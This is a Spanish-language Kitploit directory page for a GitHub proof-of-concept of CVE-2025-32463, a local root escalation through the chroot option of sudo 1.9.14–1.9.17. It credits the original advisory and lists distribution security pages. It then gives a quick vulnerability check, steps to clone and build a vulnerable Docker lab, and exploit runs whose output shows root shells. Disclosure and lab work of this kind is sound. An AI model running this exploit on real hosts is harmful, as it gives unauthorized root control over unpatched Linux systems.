Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463_chwoot — Escalada de privilegios a root a través del binario sudo con la opción chroot. CVE-2025-32463 | Kitploit
Herramientas/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingEscape de Contenedores
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

Escalada de privilegios a root a través del binario sudo con la opción chroot. CVE-2025-32463

Ver Repositorio
5259512hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32463 – sudo chroot ("chwoot") PoC

Este repositorio proporciona un entorno mínimo y reproducible para demostrar la falla de escalada de privilegios CVE‑2025‑32463 en la característica chroot de sudo.

  • Esta vulnerabilidad fue reportada por Rich Mirch (@0xm1rch en X) de Stratascale.
  • Publicación original: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

Versiones Afectadas

Las compilaciones vulnerables de sudo 1.9.14 hasta 1.9.17 (todas las p‑revisiones) en la mayoría de las distribuciones de Linux se ven afectadas.

Páginas de seguridad

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian (CVSS 7.8)

Contenido

ArchivoPropósito
DockerfileConstruye una imagen de Ubuntu 24.04 con sudo 1.9.16p2 vulnerable y herramientas de compilación
sudo‑chwoot.shExploit de prueba de concepto que genera un shell root dentro del chroot

Verificación rápida de vulnerabilidad

root@kitploit:~
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Probar exploit en contenedor Docker

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh pasa --privileged y --rm a Docker para que el contenedor se limpie solo al salir.


Limpieza

Elimina la imagen cuando hayas terminado:

root@kitploit:~
docker rmi sudo-chwoot

Referencia

  • Nota de vulnerabilidad de Stratascale CRU: Vulnerability Advisory: Sudo chroot Elevation of Privilege
Descargar herramienta
run.sh
Script auxiliar que construye la imagen (si es necesario) y lanza el contenedor del exploit